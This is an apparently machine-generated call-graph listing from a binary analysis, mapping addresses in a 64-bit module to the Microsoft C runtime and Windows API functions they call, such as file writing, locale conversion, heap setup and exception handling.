18295 7fef9d3ef10 25 API calls 18292->18295 18293->18292 18294 7fef9d3eec0 25 API calls 18293->18294 18302 7fef9d3da75 18293->18302 18294->18292 18296 7fef9d3eafd 18295->18296 18297 7fef9d3eb33 18296->18297 18299 7fef9d3eec0 25 API calls 18296->18299 18298 7fef9d3ec29 18297->18298 18312 7fef9d3eb49 _CrtMemDumpAllObjectsSince 18297->18312 18300 7fef9d3ebda 18298->18300 18301 7fef9d3ef10 25 API calls 18298->18301 18299->18297 18300->18302 18305 7fef9d3eec0 25 API calls 18300->18305 18301->18300 18303 7fef9d3eca1 18302->18303 18308 7fef9d3dbb5 18302->18308 18304 7fef9d2bd70 _invalid_parameter 17 API calls 18303->18304 18307 7fef9d3dbe9 _LocaleUpdate::~_LocaleUpdate 18303->18307 18304->18307 18305->18302 18306 7fef9d23280 __GSHandlerCheck 8 API calls 18309 7fef9d3ed9e 18306->18309 18307->18306 18311 7fef9d2bd70 _invalid_parameter 17 API calls 18308->18311 18310 7fef9d3f000 wcsxfrm 2 API calls 18310->18312 18311->18307 18312->18300 18312->18310 18313 7fef9d3ee40 25 API calls 18312->18313 18313->18312 17689 7fef9d210b0 17691 7fef9d210da 17689->17691 17690 7fef9d210fc 17693 7fef9d23280 __GSHandlerCheck 8 API calls 17690->17693 17691->17690 17692 7fef9d21000 4 API calls 17691->17692 17692->17690 17694 7fef9d2112c 17693->17694 18314 7fef9d39fba 18326 7fef9d39c4d 18314->18326 18315 7fef9d3a06d WriteFile 18316 7fef9d3a103 GetLastError 18315->18316 18315->18326 18323 7fef9d39dd9 _dosmaperr __doserrno 18316->18323 18317 7fef9d23280 __GSHandlerCheck 8 API calls 18319 7fef9d3a9f5 18317->18319 18318 7fef9d39f66 WideCharToMultiByte 18320 7fef9d39fbf WriteFile 18318->18320 18318->18323 18322 7fef9d3a050 GetLastError 18320->18322 18320->18326 18321 7fef9d3fc00 WriteConsoleW CreateFileW _putwch_nolock 18321->18326 18322->18323 18323->18317 18324 7fef9d3a158 GetLastError 18324->18323 18325 7fef9d3f330 MultiByteToWideChar MultiByteToWideChar wcsxfrm 18325->18326 18326->18315 18326->18318 18326->18321 18326->18323 18326->18324 18326->18325 18327 7fef9d3a1b5 GetLastError 18326->18327 18327->18323 17695 7fef9d3bcbd 17696 7fef9d3b99c 17695->17696 17697 7fef9d3cc93 17696->17697 17702 7fef9d3bada 17696->17702 17698 7fef9d2bd70 _invalid_parameter 17 API calls 17697->17698 17701 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 17697->17701 17698->17701 17699 7fef9d23280 __GSHandlerCheck 8 API calls 17700 7fef9d3cd90 17699->17700 17701->17699 17703 7fef9d2bd70 _invalid_parameter 17 API calls 17702->17703 17703->17701 17293 7fef9d3c1a3 17302 7fef9d3c1b0 get_int64_arg 17293->17302 17294 7fef9d3b99c 17295 7fef9d3cc93 17294->17295 17300 7fef9d3bada 17294->17300 17296 7fef9d2bd70 _invalid_parameter 17 API calls 17295->17296 17299 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 17295->17299 17296->17299 17298 7fef9d23280 __GSHandlerCheck 8 API calls 17301 7fef9d3cd90 17298->17301 17299->17298 17303 7fef9d2bd70 _invalid_parameter 17 API calls 17300->17303 17302->17294 17304 7fef9d3b530 17302->17304 17303->17299 17307 7fef9d3b090 17304->17307 17306 7fef9d3b56c 17306->17302 17308 7fef9d3b0b7 17307->17308 17309 7fef9d3b168 17308->17309 17310 7fef9d3b1a6 _CrtMemDumpAllObjectsSince 17308->17310 17318 7fef9d3b0c2 _calloc_dbg_impl _LocaleUpdate::~_LocaleUpdate 17308->17318 17311 7fef9d2bd70 _invalid_parameter 17 API calls 17309->17311 17312 7fef9d3b1cf 17310->17312 17313 7fef9d3b347 _CrtMemDumpAllObjectsSince 17310->17313 17311->17318 17317 7fef9d2bd70 _invalid_parameter 17 API calls 17312->17317 17312->17318 17314 7fef9d3b359 WideCharToMultiByte 17313->17314 17315 7fef9d3b3ab 17314->17315 17316 7fef9d3b3c1 GetLastError 17315->17316 17315->17318 17316->17318 17319 7fef9d3b3d0 _calloc_dbg_impl 17316->17319 17317->17318 17318->17306 17319->17318 17320 7fef9d2bd70 _invalid_parameter 17 API calls 17319->17320 17320->17318 17708 7fef9d3809f 17709 7fef9d380b0 _calloc_dbg_impl 17708->17709 17710 7fef9d38145 _calloc_dbg_impl 17708->17710 17710->17709 17711 7fef9d2bd70 _invalid_parameter 17 API calls 17710->17711 17711->17709 17712 7fef9d32c9f 17713 7fef9d32caf 17712->17713 17714 7fef9d32ca6 17712->17714 17714->17713 17715 7fef9d2bd70 _invalid_parameter 17 API calls 17714->17715 17715->17713 17716 7fef9d3d4a0 17717 7fef9d3d4b7 std::bad_exception::~bad_exception 17716->17717 17718 7fef9d3d4cc 17717->17718 17719 7fef9d3d710 _Ref_count LeaveCriticalSection 17717->17719 17719->17718 18328 7fef9d3a7a0 18336 7fef9d3a61f 18328->18336 18329 7fef9d3a726 WideCharToMultiByte 18330 7fef9d3a791 GetLastError 18329->18330 18329->18336 18331 7fef9d3a887 _dosmaperr __doserrno 18330->18331 18332 7fef9d23280 __GSHandlerCheck 8 API calls 18331->18332 18335 7fef9d3a9f5 18332->18335 18333 7fef9d3a7b0 WriteFile 18334 7fef9d3a857 GetLastError 18333->18334 18333->18336 18334->18336 18336->18329 18336->18331 18336->18333 16665 7fef9d2aca8 16666 7fef9d2acb2 16665->16666 16667 7fef9d274e0 __crtExitProcess 3 API calls 16666->16667 16668 7fef9d2acbc RtlAllocateHeap 16667->16668 17724 7fef9d25cad 17727 7fef9d25cb8 17724->17727 17726 7fef9d26201 17728 7fef9d25e1a _realloc_dbg 17727->17728 17729 7fef9d29360 LeaveCriticalSection 17727->17729 17729->17726 18349 7fef9d23faa 18350 7fef9d23e30 LeaveCriticalSection 18349->18350 18351 7fef9d23fb6 GetCurrentThreadId 18350->18351 18352 7fef9d23fea SetLastError 18351->18352 18353 7fef9d2cb4f 18358 7fef9d2cb5c 18353->18358 18354 7fef9d23280 __GSHandlerCheck 8 API calls 18355 7fef9d2cf0f 18354->18355 18356 7fef9d2cbeb GetStdHandle 18357 7fef9d2cc94 18356->18357 18360 7fef9d2cc07 std::exception::_Copy_str 18356->18360 18357->18354 18358->18356 18358->18357 18359 7fef9d2cc99 18358->18359 18359->18357 18361 7fef9d31640 17 API calls 18359->18361 18360->18357 18363 7fef9d2cc73 WriteFile 18360->18363 18362 7fef9d2cd10 18361->18362 18364 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18362->18364 18363->18357 18365 7fef9d2cd3d GetModuleFileNameW 18364->18365 18366 7fef9d2cd68 18365->18366 18371 7fef9d2cdb1 18365->18371 18367 7fef9d31640 17 API calls 18366->18367 18368 7fef9d2cd84 18367->18368 18369 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18368->18369 18369->18371 18370 7fef9d2ce5e 18372 7fef9d32d80 17 API calls 18370->18372 18371->18370 18382 7fef9d33380 18371->18382 18373 7fef9d2ce76 18372->18373 18374 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18373->18374 18376 7fef9d2cea3 18374->18376 18378 7fef9d32d80 17 API calls 18376->18378 18377 7fef9d2ce31 18379 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18377->18379 18380 7fef9d2ceb9 18378->18380 18379->18370 18381 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18380->18381 18381->18357 18384 7fef9d333a6 18382->18384 18383 7fef9d3342f 18385 7fef9d2bd70 _invalid_parameter 17 API calls 18383->18385 18384->18383 18386 7fef9d333bc _calloc_dbg_impl 18384->18386 18387 7fef9d3346d _calloc_dbg_impl 18384->18387 18385->18386 18386->18377 18387->18386 18388 7fef9d33639 _calloc_dbg_impl 18387->18388 18389 7fef9d335fb 18387->18389 18388->18386 18391 7fef9d2bd70 _invalid_parameter 17 API calls 18388->18391 18390 7fef9d2bd70 _invalid_parameter 17 API calls 18389->18390 18390->18386 18391->18386 17739 7fef9d25854 17740 7fef9d2585b _calloc_dbg_impl 17739->17740 17741 7fef9d2c020 _free_base 2 API calls 17740->17741 17742 7fef9d259d5 17741->17742 17321 7fef9d40550 17322 7fef9d40575 17321->17322 17323 7fef9d4055e 17321->17323 17323->17322 17324 7fef9d40568 CloseHandle 17323->17324 17324->17322 18829 7fef9d3465b 18839 7fef9d3445a __SehTransFilter 18829->18839 18830 7fef9d347d7 18831 7fef9d3485b 18830->18831 18832 7fef9d2cf80 _inconsistency 36 API calls 18830->18832 18832->18831 18833 7fef9d3466c __SehTransFilter 18833->18830 18834 7fef9d35bb0 __SehTransFilter 36 API calls 18833->18834 18835 7fef9d34727 18834->18835 18835->18830 18836 7fef9d2e500 __SetUnwindTryBlock 37 API calls 18835->18836 18837 7fef9d34767 18836->18837 18838 7fef9d2edc0 __SehTransFilter 9 API calls 18837->18838 18838->18830 18839->18833 18840 7fef9d35180 __SehTransFilter 38 API calls 18839->18840 18840->18839 17325 7fef9d3595c 17326 7fef9d2cf50 terminate 35 API calls 17325->17326 17327 7fef9d35961 17326->17327 17743 7fef9d2a057 17744 7fef9d2a061 17743->17744 17745 7fef9d2a234 17744->17745 17752 7fef9d2a08e __initmbctable 17744->17752 17747 7fef9d2a25d IsValidCodePage 17745->17747 17751 7fef9d2a22d __initmbctable 17745->17751 17746 7fef9d23280 __GSHandlerCheck 8 API calls 17748 7fef9d2a470 17746->17748 17749 7fef9d2a27b GetCPInfo 17747->17749 17747->17751 17750 7fef9d2a295 __initmbctable 17749->17750 17749->17751 17754 7fef9d2a5e0 __initmbctable 19 API calls 17750->17754 17751->17746 17753 7fef9d2a5e0 __initmbctable 19 API calls 17752->17753 17753->17751 17754->17751 18419 7fef9d25357 18422 7fef9d29360 LeaveCriticalSection 18419->18422 18421 7fef9d25361 18422->18421 17760 7fef9d2405b 17762 7fef9d2406e 17760->17762 17766 7fef9d29360 LeaveCriticalSection 17762->17766 17764 7fef9d24224 17765 7fef9d241bb _updatetlocinfoEx_nolock 17767 7fef9d29360 LeaveCriticalSection 17765->17767 17766->17765 17767->17764 17328 7fef9d2e55a 17329 7fef9d2e564 17328->17329 17330 7fef9d2e5c2 RtlLookupFunctionEntry 17329->17330 17331 7fef9d2e601 17329->17331 17330->17331 18841 7fef9d2425a FlsGetValue FlsSetValue 18842 7fef9d24283 18841->18842 16617 7fef9d27640 GetStartupInfoW 16619 7fef9d27676 _calloc_dbg 16617->16619 16618 7fef9d27ce0 SetHandleCount 16629 7fef9d27689 16618->16629 16621 7fef9d27ab9 16619->16621 16627 7fef9d27a32 InitializeCriticalSectionAndSpinCount 16619->16627 16628 7fef9d27a19 GetFileType 16619->16628 16619->16629 16620 7fef9d27b95 GetStdHandle 16622 7fef9d27bb9 16620->16622 16624 7fef9d27c7b 16620->16624 16621->16618 16621->16620 16621->16624 16623 7fef9d27bc8 GetFileType 16622->16623 16622->16624 16623->16624 16625 7fef9d27beb InitializeCriticalSectionAndSpinCount 16623->16625 16624->16618 16625->16624 16625->16629 16627->16621 16627->16629 16628->16621 16628->16627 17332 7fef9d21140 17333 7fef9d2116a 17332->17333 17334 7fef9d2118c 17333->17334 17335 7fef9d2119a FileTimeToSystemTime 17333->17335 17337 7fef9d23280 __GSHandlerCheck 8 API calls 17334->17337 17335->17334 17336 7fef9d211ae 17335->17336 17340 7fef9d21000 GetThreadLocale GetDateFormatA 17336->17340 17339 7fef9d211d0 17337->17339 17341 7fef9d21062 GetThreadLocale GetTimeFormatA 17340->17341 17342 7fef9d2105b 17340->17342 17341->17342 17342->17334 17768 7fef9d28040 17769 7fef9d28056 17768->17769 17770 7fef9d2805b GetModuleFileNameA 17768->17770 17771 7fef9d2aa40 __initmbctable 24 API calls 17769->17771 17772 7fef9d28083 17770->17772 17771->17770 18843 7fef9d29240 18844 7fef9d2925f 18843->18844 18845 7fef9d2924d 18843->18845 18846 7fef9d29281 InitializeCriticalSectionAndSpinCount 18844->18846 18847 7fef9d29295 18844->18847 18846->18847 18849 7fef9d29360 LeaveCriticalSection 18847->18849 18849->18845 18850 7fef9d2ae40 18851 7fef9d2d490 std::exception::_Copy_str 17 API calls 18850->18851 18852 7fef9d2ae59 18851->18852 18853 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18852->18853 18854 7fef9d2ae86 std::exception::_Copy_str 18853->18854 18855 7fef9d30fd0 17 API calls 18854->18855 18858 7fef9d2af3a std::exception::_Copy_str 18854->18858 18856 7fef9d2af0d 18855->18856 18857 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18856->18857 18857->18858 18860 7fef9d2b2e0 18858->18860 18861 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 18858->18861 18859 7fef9d2b33e 18863 7fef9d30cc0 25 API calls 18859->18863 18860->18859 18862 7fef9d2d490 std::exception::_Copy_str 17 API calls 18860->18862 18861->18860 18864 7fef9d2b311 18862->18864 18865 7fef9d2b358 18863->18865 18866 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18864->18866 18867 7fef9d2b37d 18865->18867 18868 7fef9d2cff0 terminate 34 API calls 18865->18868 18866->18859 18871 7fef9d23280 __GSHandlerCheck 8 API calls 18867->18871 18869 7fef9d2b373 18868->18869 18870 7fef9d27090 _exit 33 API calls 18869->18870 18870->18867 18872 7fef9d2b3a0 18871->18872 17343 7fef9d3f53e 17344 7fef9d3f55c 17343->17344 17345 7fef9d3f74d 17344->17345 17349 7fef9d40170 17344->17349 17347 7fef9d23280 __GSHandlerCheck 8 API calls 17345->17347 17348 7fef9d3f7c5 17347->17348 17350 7fef9d40185 17349->17350 17351 7fef9d3afb0 _fflush_nolock 17 API calls 17350->17351 17352 7fef9d401c7 17351->17352 17353 7fef9d401dc 17352->17353 17354 7fef9d3ab10 17 API calls 17352->17354 17355 7fef9d40326 17352->17355 17353->17345 17354->17355 17355->17353 17356 7fef9d39290 23 API calls 17355->17356 17356->17353 17773 7fef9d41040 17776 7fef9d2e8f0 17773->17776 17775 7fef9d4108f 17777 7fef9d2e90d 17776->17777 17780 7fef9d33cc0 17777->17780 17779 7fef9d2e980 17779->17775 17781 7fef9d33cdd 17780->17781 17783 7fef9d33d82 17781->17783 17784 7fef9d33ef3 __SehTransFilter 17781->17784 17795 7fef9d33d62 17781->17795 17785 7fef9d33dc8 17783->17785 17789 7fef9d33e40 17783->17789 17783->17795 17784->17795 17798 7fef9d340b0 17784->17798 17787 7fef9d33a60 __StateFromControlPc 36 API calls 17785->17787 17786 7fef9d2e790 __SehTransFilter 37 API calls 17786->17795 17788 7fef9d33dec 17787->17788 17792 7fef9d2cf80 _inconsistency 36 API calls 17788->17792 17794 7fef9d33e08 17788->17794 17790 7fef9d33e93 17789->17790 17791 7fef9d2cf80 _inconsistency 36 API calls 17789->17791 17796 7fef9d33ebd 17789->17796 17793 7fef9d34f20 __SehTransFilter 36 API calls 17790->17793 17791->17790 17792->17794 17793->17796 17797 7fef9d34f20 __SehTransFilter 36 API calls 17794->17797 17795->17779 17796->17786 17796->17795 17797->17795 17799 7fef9d33b40 __StateFromControlPc 36 API calls 17798->17799 17800 7fef9d340ea 17799->17800 17801 7fef9d2e500 __SetUnwindTryBlock 37 API calls 17800->17801 17802 7fef9d34110 17801->17802 17843 7fef9d33c70 17802->17843 17805 7fef9d34133 __SetState 17846 7fef9d33c00 17805->17846 17806 7fef9d34176 17807 7fef9d33c70 __GetUnwindTryBlock 37 API calls 17806->17807 17808 7fef9d34174 17807->17808 17810 7fef9d2cf80 _inconsistency 36 API calls 17808->17810 17818 7fef9d341af _ValidateRead _SetThrowImageBase 17808->17818 17810->17818 17811 7fef9d347d9 17813 7fef9d347f3 17811->17813 17814 7fef9d34847 17811->17814 17820 7fef9d347d7 17811->17820 17812 7fef9d34347 17812->17811 17815 7fef9d343f5 17812->17815 17860 7fef9d34960 17813->17860 17817 7fef9d2cf50 terminate 35 API calls 17814->17817 17823 7fef9d3466c __SehTransFilter 17815->17823 17855 7fef9d2ea30 17815->17855 17817->17820 17818->17812 17819 7fef9d34235 17818->17819 17827 7fef9d2cf80 _inconsistency 36 API calls 17818->17827 17830 7fef9d3428e 17818->17830 17819->17795 17820->17819 17822 7fef9d2cf80 _inconsistency 36 API calls 17820->17822 17822->17819 17823->17820 17824 7fef9d35bb0 __SehTransFilter 36 API calls 17823->17824 17825 7fef9d34727 17824->17825 17825->17820 17826 7fef9d2e500 __SetUnwindTryBlock 37 API calls 17825->17826 17828 7fef9d34767 17826->17828 17827->17830 17829 7fef9d2edc0 __SehTransFilter 9 API calls 17828->17829 17829->17820 17831 7fef9d2cf80 _inconsistency 36 API calls 17830->17831 17832 7fef9d342fa 17830->17832 17831->17832 17832->17812 17834 7fef9d35bb0 __SehTransFilter 36 API calls 17832->17834 17833 7fef9d34450 __SehTransFilter 17833->17823 17835 7fef9d35180 __SehTransFilter 38 API calls 17833->17835 17836 7fef9d34340 __SehTransFilter 17834->17836 17835->17833 17836->17812 17837 7fef9d34393 17836->17837 17838 7fef9d3435a __SehTransFilter 17836->17838 17839 7fef9d2cf50 terminate 35 API calls 17837->17839 17849 7fef9d34870 17838->17849 17839->17812 17844 7fef9d2e500 __SetUnwindTryBlock 37 API calls 17843->17844 17845 7fef9d33c9c 17844->17845 17845->17805 17845->17806 17847 7fef9d2e500 __SetUnwindTryBlock 37 API calls 17846->17847 17848 7fef9d33c31 17847->17848 17848->17808 17870 7fef9d3d4e0 17849->17870 17852 7fef9d3d320 17854 7fef9d3d375 17852->17854 17853 7fef9d3d3ba RaiseException 17853->17812 17854->17853 17856 7fef9d33b40 __StateFromControlPc 36 API calls 17855->17856 17857 7fef9d2ea6f 17856->17857 17858 7fef9d2cf80 _inconsistency 36 API calls 17857->17858 17859 7fef9d2ea7a 17857->17859 17858->17859 17859->17833 17862 7fef9d34990 17860->17862 17867 7fef9d3498b 17860->17867 17861 7fef9d349b2 __SehTransFilter 17863 7fef9d34a41 17861->17863 17864 7fef9d2cf80 _inconsistency 36 API calls 17861->17864 17861->17867 17862->17861 17873 7fef9d23d00 RtlEncodePointer 17862->17873 17865 7fef9d2ea30 __SehTransFilter 36 API calls 17863->17865 17864->17863 17868 7fef9d34a8e __SehTransFilter 17865->17868 17867->17820 17868->17867 17869 7fef9d35180 __SehTransFilter 38 API calls 17868->17869 17869->17867 17871 7fef9d3d660 std::exception::_Copy_str 17 API calls 17870->17871 17872 7fef9d3437d 17871->17872 17872->17852 17873->17861 17874 7fef9d3dc41 17875 7fef9d3ee40 25 API calls 17874->17875 17877 7fef9d3da75 17875->17877 17876 7fef9d3eca1 17878 7fef9d3dbe9 _LocaleUpdate::~_LocaleUpdate 17876->17878 17879 7fef9d2bd70 _invalid_parameter 17 API calls 17876->17879 17877->17876 17881 7fef9d3dbb5 17877->17881 17880 7fef9d23280 __GSHandlerCheck 8 API calls 17878->17880 17879->17878 17882 7fef9d3ed9e 17880->17882 17883 7fef9d2bd70 _invalid_parameter 17 API calls 17881->17883 17883->17878 18873 7fef9d40e40 18874 7fef9d40e50 18873->18874 18876 7fef9d40e5e 18873->18876 18875 7fef9d23e00 3 API calls 18874->18875 18874->18876 18875->18876 17884 7fef9d2d04a 17885 7fef9d2d1d8 DecodePointer 17884->17885 17886 7fef9d2d1e8 17885->17886 17887 7fef9d27090 _exit 33 API calls 17886->17887 17888 7fef9d2d209 17886->17888 17892 7fef9d2d1f0 17886->17892 17887->17888 17890 7fef9d2d289 17888->17890 17893 7fef9d23d00 RtlEncodePointer 17888->17893 17890->17892 17894 7fef9d29360 LeaveCriticalSection 17890->17894 17893->17890 17894->17892 16228 7fef9d23471 16229 7fef9d234bc 16228->16229 16230 7fef9d2347a 16228->16230 16231 7fef9d23496 16230->16231 16240 7fef9d270b0 16230->16240 16243 7fef9d27d00 16231->16243 16238 7fef9d234a5 16238->16229 16239 7fef9d23e00 3 API calls 16238->16239 16239->16229 16253 7fef9d27280 16240->16253 16245 7fef9d27d0e 16243->16245 16244 7fef9d2349b 16247 7fef9d23e00 16244->16247 16245->16244 16246 7fef9d27d87 DeleteCriticalSection 16245->16246 16246->16245 16248 7fef9d23e23 16247->16248 16249 7fef9d23e0d FlsFree 16247->16249 16413 7fef9d290b0 16248->16413 16249->16248 16252 7fef9d288d0 HeapDestroy 16252->16238 16254 7fef9d27296 _exit 16253->16254 16255 7fef9d272c7 RtlDecodePointer 16254->16255 16261 7fef9d27368 _initterm 16254->16261 16274 7fef9d2744e 16254->16274 16259 7fef9d272e5 DecodePointer 16255->16259 16255->16261 16256 7fef9d2745e 16258 7fef9d270c3 16256->16258 16260 7fef9d27520 _exit LeaveCriticalSection 16256->16260 16258->16231 16270 7fef9d27314 16259->16270 16262 7fef9d27479 16260->16262 16261->16274 16277 7fef9d26210 16261->16277 16300 7fef9d274e0 16262->16300 16267 7fef9d2736d DecodePointer 16276 7fef9d23d00 RtlEncodePointer 16267->16276 16270->16261 16270->16267 16273 7fef9d27391 DecodePointer DecodePointer 16270->16273 16275 7fef9d23d00 RtlEncodePointer 16270->16275 16271 7fef9d27449 16290 7fef9d26f10 16271->16290 16273->16270 16274->16256 16297 7fef9d27520 16274->16297 16275->16270 16276->16270 16278 7fef9d26229 16277->16278 16279 7fef9d2628f 16278->16279 16280 7fef9d262cb 16278->16280 16303 7fef9d2bd70 DecodePointer 16279->16303 16307 7fef9d29360 LeaveCriticalSection 16280->16307 16283 7fef9d262c3 16283->16274 16284 7fef9d27100 16283->16284 16285 7fef9d27112 16284->16285 16286 7fef9d271e4 DecodePointer 16285->16286 16287 7fef9d271fe 16286->16287 16332 7fef9d23d00 RtlEncodePointer 16287->16332 16289 7fef9d27219 16289->16271 16333 7fef9d263e0 16290->16333 16292 7fef9d26f33 16293 7fef9d26f8e 16292->16293 16341 7fef9d26660 16292->16341 16295 7fef9d23280 __GSHandlerCheck 8 API calls 16293->16295 16296 7fef9d26fa7 16295->16296 16296->16274 16409 7fef9d29360 LeaveCriticalSection 16297->16409 16299 7fef9d2752e 16299->16256 16410 7fef9d27490 GetModuleHandleW 16300->16410 16304 7fef9d2bdd0 16303->16304 16305 7fef9d2bdac 16303->16305 16308 7fef9d2be00 16304->16308 16305->16283 16307->16283 16311 7fef9d2be50 16308->16311 16312 7fef9d2be81 __GSHandlerCheck 16311->16312 16313 7fef9d2be8d RtlCaptureContext RtlLookupFunctionEntry 16311->16313 16312->16313 16314 7fef9d2bf64 16313->16314 16315 7fef9d2bf1c RtlVirtualUnwind 16313->16315 16316 7fef9d2bf84 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16314->16316 16315->16316 16317 7fef9d2bfde __GSHandlerCheck 16316->16317 16320 7fef9d23280 16317->16320 16319 7fef9d2be2d GetCurrentProcess TerminateProcess 16319->16305 16321 7fef9d23289 16320->16321 16322 7fef9d23294 16321->16322 16323 7fef9d23720 RtlCaptureContext RtlLookupFunctionEntry 16321->16323 16322->16319 16324 7fef9d237a5 16323->16324 16325 7fef9d23764 RtlVirtualUnwind 16323->16325 16326 7fef9d237c7 IsDebuggerPresent 16324->16326 16325->16326 16331 7fef9d28d90 16326->16331 16328 7fef9d23826 SetUnhandledExceptionFilter UnhandledExceptionFilter 16329 7fef9d2384e GetCurrentProcess TerminateProcess 16328->16329 16330 7fef9d23844 __GSHandlerCheck 16328->16330 16329->16319 16330->16329 16331->16328 16332->16289 16334 7fef9d263f1 16333->16334 16335 7fef9d26447 16334->16335 16338 7fef9d26480 16334->16338 16336 7fef9d2bd70 _invalid_parameter 17 API calls 16335->16336 16337 7fef9d2647b 16336->16337 16337->16292 16340 7fef9d26504 16338->16340 16345 7fef9d29360 LeaveCriticalSection 16338->16345 16340->16292 16342 7fef9d26681 _CrtMemDumpAllObjectsSince 16341->16342 16346 7fef9d26850 16342->16346 16344 7fef9d26698 _LocaleUpdate::~_LocaleUpdate 16344->16293 16345->16337 16347 7fef9d26871 16346->16347 16348 7fef9d26ba6 16347->16348 16351 7fef9d268ed _CrtIsValidPointer 16347->16351 16376 7fef9d29360 LeaveCriticalSection 16348->16376 16350 7fef9d26bb0 16350->16344 16352 7fef9d2695e IsBadReadPtr 16351->16352 16353 7fef9d26976 16351->16353 16360 7fef9d2692f 16351->16360 16352->16353 16354 7fef9d26ad2 16353->16354 16355 7fef9d26a29 16353->16355 16356 7fef9d26b2d 16354->16356 16357 7fef9d26add 16354->16357 16358 7fef9d26abe 16355->16358 16359 7fef9d26a86 IsBadReadPtr 16355->16359 16356->16360 16363 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 16356->16363 16362 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 16357->16362 16364 7fef9d26bf0 16358->16364 16359->16358 16359->16360 16360->16344 16362->16360 16363->16360 16365 7fef9d26c28 16364->16365 16366 7fef9d26e25 _LocaleUpdate::~_LocaleUpdate 16365->16366 16367 7fef9d26c7a _CrtMemDumpAllObjectsSince 16365->16367 16368 7fef9d23280 __GSHandlerCheck 8 API calls 16366->16368 16371 7fef9d26ce0 _CrtMemDumpAllObjectsSince _CrtMemDumpAllObjectsSince_stat 16367->16371 16377 7fef9d2c260 16367->16377 16369 7fef9d26e89 16368->16369 16369->16360 16381 7fef9d2c0c0 16371->16381 16373 7fef9d26e12 16373->16360 16374 7fef9d26dc7 16374->16373 16384 7fef9d26ea0 16374->16384 16376->16350 16378 7fef9d2c286 _CrtMemDumpAllObjectsSince wcsxfrm 16377->16378 16380 7fef9d2c29d _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 16378->16380 16388 7fef9d2f4d0 16378->16388 16380->16371 16399 7fef9d32260 16381->16399 16383 7fef9d2c103 16383->16374 16385 7fef9d26ebd 16384->16385 16386 7fef9d26ed1 16384->16386 16385->16386 16387 7fef9d2be00 _invoke_watson_if_oneof 16 API calls 16385->16387 16386->16373 16387->16386 16389 7fef9d2f4f9 _CrtMemDumpAllObjectsSince 16388->16389 16392 7fef9d2f570 16389->16392 16391 7fef9d2f550 _LocaleUpdate::~_LocaleUpdate 16391->16380 16393 7fef9d2f599 MultiByteToWideChar 16392->16393 16395 7fef9d2f604 _CrtMemDumpAllObjectsSince_stat 16393->16395 16396 7fef9d2f60b malloc _calloc_dbg_impl _MarkAllocaS 16393->16396 16395->16391 16396->16395 16397 7fef9d2f68b MultiByteToWideChar 16396->16397 16397->16395 16398 7fef9d2f6ca GetStringTypeW 16397->16398 16398->16395 16400 7fef9d3228b 16399->16400 16401 7fef9d322e1 16400->16401 16402 7fef9d3231f 16400->16402 16403 7fef9d2bd70 _invalid_parameter 17 API calls 16401->16403 16404 7fef9d32385 16402->16404 16407 7fef9d323c3 _calloc_dbg_impl 16402->16407 16406 7fef9d32315 _calloc_dbg_impl 16403->16406 16405 7fef9d2bd70 _invalid_parameter 17 API calls 16404->16405 16405->16406 16406->16383 16407->16406 16408 7fef9d2bd70 _invalid_parameter 17 API calls 16407->16408 16408->16406 16409->16299 16411 7fef9d274b2 GetProcAddress 16410->16411 16412 7fef9d274d1 ExitProcess 16410->16412 16411->16412 16416 7fef9d290be 16413->16416 16414 7fef9d290fd DeleteCriticalSection 16414->16416 16415 7fef9d234a0 16415->16252 16416->16414 16417 7fef9d2914d 16416->16417 16417->16415 16418 7fef9d29196 DeleteCriticalSection 16417->16418 16418->16417 16456 7fef9d28670 GetEnvironmentStringsW 16457 7fef9d28690 16456->16457 16459 7fef9d28697 WideCharToMultiByte 16456->16459 16460 7fef9d2875f FreeEnvironmentStringsW 16459->16460 16461 7fef9d28733 16459->16461 16460->16457 16461->16460 16462 7fef9d2876e WideCharToMultiByte 16461->16462 16463 7fef9d287c2 FreeEnvironmentStringsW 16462->16463 16464 7fef9d287aa 16462->16464 16463->16457 16464->16463 17365 7fef9d3e16f 17366 7fef9d3e17c _CrtMemDumpAllObjectsSince wcsxfrm get_int64_arg 17365->17366 17367 7fef9d3eadf 17366->17367 17377 7fef9d3da75 17366->17377 17388 7fef9d3eec0 17366->17388 17392 7fef9d3ef10 17367->17392 17370 7fef9d3eafd 17371 7fef9d3eb33 17370->17371 17373 7fef9d3eec0 25 API calls 17370->17373 17372 7fef9d3ec29 17371->17372 17386 7fef9d3eb49 _CrtMemDumpAllObjectsSince 17371->17386 17374 7fef9d3ebda 17372->17374 17375 7fef9d3ef10 25 API calls 17372->17375 17373->17371 17374->17377 17379 7fef9d3eec0 25 API calls 17374->17379 17375->17374 17376 7fef9d3eca1 17378 7fef9d2bd70 _invalid_parameter 17 API calls 17376->17378 17381 7fef9d3dbe9 _LocaleUpdate::~_LocaleUpdate 17376->17381 17377->17376 17382 7fef9d3dbb5 17377->17382 17378->17381 17379->17377 17380 7fef9d23280 __GSHandlerCheck 8 API calls 17383 7fef9d3ed9e 17380->17383 17381->17380 17385 7fef9d2bd70 _invalid_parameter 17 API calls 17382->17385 17385->17381 17386->17374 17396 7fef9d3f000 17386->17396 17403 7fef9d3ee40 17386->17403 17390 7fef9d3eed7 17388->17390 17389 7fef9d3ee40 25 API calls 17389->17390 17390->17389 17391 7fef9d3ef07 17390->17391 17391->17367 17394 7fef9d3ef2c 17392->17394 17393 7fef9d3ef4d 17393->17370 17394->17393 17395 7fef9d3ee40 25 API calls 17394->17395 17395->17394 17397 7fef9d3f026 _CrtMemDumpAllObjectsSince wcsxfrm 17396->17397 17400 7fef9d3f031 _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 17396->17400 17398 7fef9d3f276 _CrtMemDumpAllObjectsSince 17397->17398 17397->17400 17401 7fef9d3f146 _CrtMemDumpAllObjectsSince 17397->17401 17399 7fef9d3f29d MultiByteToWideChar 17398->17399 17399->17400 17400->17386 17401->17400 17402 7fef9d3f1b5 